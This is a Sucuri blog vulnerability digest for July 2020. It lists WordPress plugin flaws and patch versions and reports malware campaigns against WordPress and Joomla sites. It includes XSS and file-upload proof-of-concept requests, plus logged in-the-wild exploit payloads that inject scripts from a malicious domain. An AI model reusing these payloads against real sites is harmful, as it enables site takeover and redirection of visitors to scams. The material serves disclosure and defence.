• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

Vulnerabilities Digest: July 2020

August 3, 2020John Castro

14
SHARES
FacebookTwitterSubscribe

Relevant Plugins and Vulnerabilities:

Plugin Vulnerability Patched Version Installs
Asset CleanUp: Page Speed Authenticated XSS 1.4.6.7 80000
Quiz And Survey Master Authenticated Stored XSS 7.0.0 30000
Comments – wpDiscuz 7.0.0 – Arbitrary File Upload 7.0.5 70000
Real Estate 7 Reflected XSS 3.0.4 8000
CarePlus Reflected XSS — 5000
WooCommerce Subscriptions Unauthenticated Stored XSS 2.6.3 10000
Careerfy Reflected XSS 4.4.0 2300
JobSearch Reflected XSS 1.5.6 1300
TC Custom JavaScript Unauthenticated Stored XSS 1.2.2 10000
Email Subscribers & Newsletters Authenticated SQL injection 4.5.1 100000
WP-Live Chat by 3CX Authenticated Stored XSS 8.2.0 50000
InJob Reflected XSS 3.4.1 1880
Travel Booking Unauthenticated SQL Injection 2.8.4 8000
Travel Booking Unauthenticated XSS 2.8.4 8000
Monalisa Reflected XSS 2.1.3 600
Adning Advertising Arbitrary File Upload 1.5.6 8000
Security & Malware scan Security Nonce Leak 2.51 5000
Testimonials Widget Authenticated Stored XSS — 30000

Highlights for July 2020:

  • Cross site scripting is still the most common vulnerability in WordPress Plugins. Bad actors are taking advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.
  • Attackers continue to target old plugins with known vulnerabilities in an ongoing malware campaign targeting WordPress websites.
  • Massive attacks on Joomla old components.

Details for these highlights can be found under the components listed below.

Asset CleanUp: Page Speed Booster

Last week, we reported multiple vulnerabilities in Asset CleanUp: Page Speed Booster caused by an improper handling of user input. This plugin has 80000 active installations. A successful attack can lead to malicious script execution.

Here are the details of one of those vulnerabilities:

Patch (version 1.3.6.7):

--- a/wp-asset-clean-up/trunk/classes/BulkChanges.php
+++ b/wp-asset-clean-up/trunk/classes/BulkChanges.php
 
     /**
-     * GlobalRules constructor.
+     * BulkChanges constructor.
      */
     public function __construct()
     {
-        $this->wpacuFor      = Misc::getVar('request', 'wpacu_for', $this->wpacuFor);
-        $this->wpacuPostType = Misc::getVar('request', 'wpacu_post_type', $this->wpacuPostType);
+        $this->wpacuFor      = sanitize_text_field(Misc::getVar('request', 'wpacu_for', $this->wpacuFor));
+        $this->wpacuPostType = sanitize_text_field(Misc::getVar('request', 'wpacu_post_type', $this->wpacuPostType));
 
-        if (Misc::getVar('request', 'wpacu_update') == 1) {
-            $this->update();
-        }
+        if (Misc::getVar('request', 'wpacu_update') == 1) {
+            $this->update();
+        }
     }

PoC:

/wp-admin/admin.php?page=wpassetcleanup_bulk_unloads&wpacu_for=%22name%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E

Adning Advertising 

The paid plugin Adning Advertising, boasting over 8,800 license sales,  fixed a remote code execution caused by poor file validation.

Vulnerable Code:

$valid_formats = isset($_POST['allowed_file_types']) ? explode(',', $_POST['allowed_file_types']) : array('jpg');
        if( in_array('jpg', $valid_formats) )
        {
            $valid_formats[] = 'jpeg';
        }

PoC:

284258444925728623104048873990\x0d\x0aContent-Disposition: form-data; name=\"files[]\"; filename=\"index.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php\x0aphpinfo();\x0a\x0d\x0a-----------------------------284258444925728623104048873990\x0d\x0[...Skipped...]623104048873990\x0d\x0aContent-Disposition: form-data; name=\"allowed_file_types\"\x0d\x0a\x0d\x0azip,jpg,png,gif,svg,mp4,php\x0d\x0a-----------------------------284258444925728623104048873990\x0d\x0aContent-Disposition: form-data; name=\"upload\"\x0d\x0a\x0d\x0a{\"folder\":\"items/56/\",\"dir\":\"/var/www/html/wordpress/wp-content/uploads/angwp/\",\"src\":\"http://vulnerable.site/wp-content/uploads/angwp/\"}\x0d\x0a-----------------------------284258444925728623104048873990--\x0d\x0a'     $'http://vulnerable.site/wp-admin/admin-ajax.php'

Attackers detect the presence of this plugin by requesting the following js file:

/wp-content/plugins/adning/webpack.config.js

This is a critical vulnerability that, when exploited, allows attackers to take control of an entire site.

Plugin Payloads in Ongoing Malware Campaign

Our team saw a number of new IPs and domains added to an ongoing campaign. This malware is typically found to redirect visitors to various kinds of scam landing pages — including tech support scams, fake lottery wins, and malicious browser notifications.

Malicious Domains & IPs detected in July

This month, two new malicious domains have been associated with this campaign exploiting known WordPress vulnerabilities:

  • https://lobbydesires[.]com/location[.]js
  • https://cls[.]balantfromsun[.]com/cls[.]js

The following IPs have been associated with this campaign:

112.96.166.247
195.54.160.21
91.208.99.2
77.247.181.162
51.83.99.191
52.228.31.213
178.33.227.167
163.172.125.41
80.82.68.202
50.62.134.81
95.211.230.211
46.105.108.212
35.224.226.217
62.210.140.4
[...]

Some Exploit Attempts Seen in the Wild

51.83.99.191 -- POST -- /wp-admin/admin-ajax.php?action=bt_bb_set_custom_css -- css=%3C%2Fstyle%3E%3Cscript++type%3Dtext%2Fjavascript+language%3Djavascript%3Eeval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%[..skipped.]%2C101%2C97%2C100%2C34%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3B%3C%2Fscript%3E%3Cstyle%3E&post_id=1 -- 2020-07-02

80.82.68.202 -- POST -- /wp-admin/admin-ajax.php?action=save_map_name -- --d3d1abe25729e072c83682bb88d79b7b595bc70f7b359af1b6baf89966a4\x0D\x0AContent-Disposition: form-data; name=\x22fff\x22; filename=\x220.txt\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A0\x0D\x0A--d3d1abe25729e072c83682bb88d79b7b595bc70f7b359af1b6baf89966a4\x0D\x0AContent-Disposition: form-data; name=\x22mapName\x22\x0D\x0A\x0D\x0A\x22><script src='https://lobbydesires.com/location.js?la=1&v14' type=text/javascript></script>\x0D\x0A--d3d1abe25729e072c83682bb88d79b7b595bc70f7b359af1b6baf89966a4\x0D\x0AContent-Disposition: form-data; name=\x22mapID\x22\x0D\x0A\x0D\x0A1\x0D\x0A--d3d1abe25729e072c83682bb88d79b7b595bc70f7b359af1b6baf89966a4--\x0D\x0A -- 2020-07-04


51.83.99.191 -- POST -- /wp-admin/admin-ajax.php -- licenseEmail=%22%3E%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Flobbydesires.com%2Flocation.js%3Fla%3D1%27%3E%3C%2Fscript%3E&licenseNumber=43 -- 2020-07-04

178.33.227.167-- POST -- /wp-admin/admin-ajax.php?action=update_zb_fbc_code -- domain=%3C%2Fscript%3E%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Flobbydesires.com%2Flocation.js%3Fla%3D1%27%3E%3C%2Fscript%3E%3Cscript%3E -- 2020-07-06

51.83.99.191 -- POST -- /wp-admin/admin-ajax.php -- action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Flobbydesires.com%2Flocation.js%3Fla%3D1%27%3E%3C%2Fscript%3E%3Cstyle%3E&cssfix=front -- 2020-07-06

52.228.31.213 -- GET -- /wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://hastebin.com/raw/etonipusij -- - -- 2020-07-06

51.83.99.191 -- PUT -- /wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1&section=gapi -- gapi_client_id=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Flobbydesires.com%2Flocation.js%3Fla%3D1%26v11%27%3E%3C%2Fscript%3E -- 2020-07-07


51.83.99.191 -- POST -- /wp-admin/admin-post.php -- action=simple_fields_do_import&import-json=%7B%0A++++%22field_groups%22%3A+%7B%0A++++++++%221%22%3A+%7B%0A++++++++++++%22id%22%3A+1%2C%0A++++++++++++%22key%22%3A+%22test%22%2C%0A++++++++++++%22slug%22%3A+%22test%22%2C%0A++++++++++++%22name%22%3A+%22test%[..skipped..]ups_count%22%3A+1%0A++++++++%7D%0A++++%7D%2C%0A++++%22post_type_defaults%22%3A+%5B%0A++++++++false%0A++++%5D%0A%7D&import-what=textarea&simple-fields-import-type=replace -- 2020-07-08

195.54.160.21 -- GET -- /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email=\x22><script type=text/javascript src='https://lobbydesires.com/location.js?la=1&v15'></script> -- - -- 2020-07-08

35.224.226.217 -- GET -- /wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://hastebin.com/raw/etonipusij -- - -- 2020-07-20

62.210.140.4 -- GET -- /wp-admin/admin-ajax.php?action=wpdAddSubscription -- - -- 2020-07-29

178.33.227.167 -- GET -- /wp-admin/admin-ajax.php?action=wpuf_file_upload -- - -- 2020-07-29

New malicious campaign aiming old Joomla Components 

This month, we detected a spike in the number of requests targeting old Joomla components. These types of attacks are fairly common, but we’ve seen an increase during this month.  Successful attacks can lead to a full website compromise.

Old Component URLs Targeted

/index.php?option=com_adsmanager&task=upload&tmpl=component
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form
/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php
/administrator/components/com_civicrm//packages/OpenFlashChart/tmp-upload-images/vuln.php
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=
/index.php?option=com_myblog&task=ajaxupload
/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php
/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form
/administrator/components/com_simplephotogallery/lib/uploadFile.php
/components/com_jnews/includes/openflashchart/tmp-upload-images/sittir.php
/components/com_jbcatalog/libraries/jsupload/server/php
[...]

Public exploits already exist for all of the components listed above, and many other plugins are also under attack. You can check our previous lab notes for additional information from past reports.

To mitigate risk, we strongly encourage you to keep your website’s software and components up to date to prevent infection or vulnerability exploitation. Websites behind the Sucuri Firewall are virtually patched against these vulnerabilities.

14
SHARES
FacebookTwitterSubscribe

Categories: Ecommerce Security, Joomla Security, Website Malware Infections, Website Security, WordPress SecurityTags: Black Hat Tactics, Website Backdoor, WordPress Plugins and Themes

About John Castro

John Castro is Sucuri's Vulnerability Researcher who joined the company in 2015. His main responsibilities include threat intelligence and vulnerability analysis. John's professional experience covers more than a decade of pentesting, vulnerability research and malware analysis. When John isn't working with WordPres plugin vulnerabilities, you might find him hiking or hunting for new restaurants. Connect with him on LinkedIn

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

2019 Threat Report

WordPress Security Course

The Anatomy of Website Malware Webinar

PCI Compliance Guide

Joomla Security Guide

WordPress Security Guide

How to know you can trust a plugin

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2021 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.